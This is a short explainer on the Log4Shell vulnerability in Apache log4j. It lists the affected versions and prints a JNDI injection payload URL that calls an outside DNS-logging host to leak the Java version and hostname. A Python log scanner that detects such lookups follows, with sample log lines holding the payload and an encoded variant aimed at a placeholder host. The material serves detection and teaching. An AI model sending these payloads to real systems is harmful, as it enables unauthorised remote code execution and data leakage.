How it works, where to practice, and how to identify

Description

The Java logging library log4j has an unauthenticated RCE vulnerability if a user-controlled string is logged.

CVE-2021-44228 (Log4Shell)

Affected versions: Apache log4j 2.0-beta9 through 2.14.1

How It Works

A specially crafted payload is injected into headers, input fields, or query/body parameters:

https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}
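
For the "how to identify" side, the following added example (not code from the original article) scans web access log lines for the `${jndi:...}` lookup shown above and reports the callback host pattern plus any nested lookups such as `${sys:java.version}` and `${hostName}`. The log lines, the `callback.example.invalid` host and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# A JNDI lookup: scheme, then the authority up to the first "/" (nested ${...} allowed).
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<authority>(?:\$\{[^}]*\}|[^/}\s])+)",
    re.IGNORECASE,
)
# A nested lookup inside the authority, e.g. ${sys:java.version} or ${hostName}.
NESTED_RE = re.compile(r"\$\{([^${}]+)\}")

# Constructed sample access log: raw payload from the article, a URL-encoded
# variant pointing at a placeholder host, and one benign request.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:10:01:02 +0000] "GET /?test=${jndi:ldap://'
    'jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp} HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Dec/2021:10:01:05 +0000] "GET /?test=%24%7Bjndi%3Aldap'
    '%3A%2F%2Fcallback.example.invalid%2Fa%7D HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Dec/2021:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1043',
]


def find_jndi_lookups(line):
    """Return one dict per JNDI lookup found in a (possibly URL-encoded) log line."""
    decoded = unquote(line)  # query strings are often percent-encoded in access logs
    hits = []
    for m in JNDI_RE.finditer(decoded):
        authority = m.group("authority")
        hits.append({
            "scheme": m.group("scheme").lower(),
            # Nested lookups show which values the request tries to leak via DNS.
            "nested_lookups": NESTED_RE.findall(authority),
            # Replace each nested lookup with "*" to get a host pattern for DNS log review.
            "host_pattern": NESTED_RE.sub("*", authority),
        })
    return hits


def scan(lines):
    """Return (line_number, hit) pairs for every lookup in the given lines."""
    return [(n, hit) for n, line in enumerate(lines, 1) for hit in find_jndi_lookups(line)]


if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LOG):
        print(f"line {n}: {hit['scheme']} -> {hit['host_pattern']} leaks={hit['nested_lookups']}")
```

It matches only the literal `${jndi:` form after URL-decoding, so treat a hit as a triage lead rather than a complete signature.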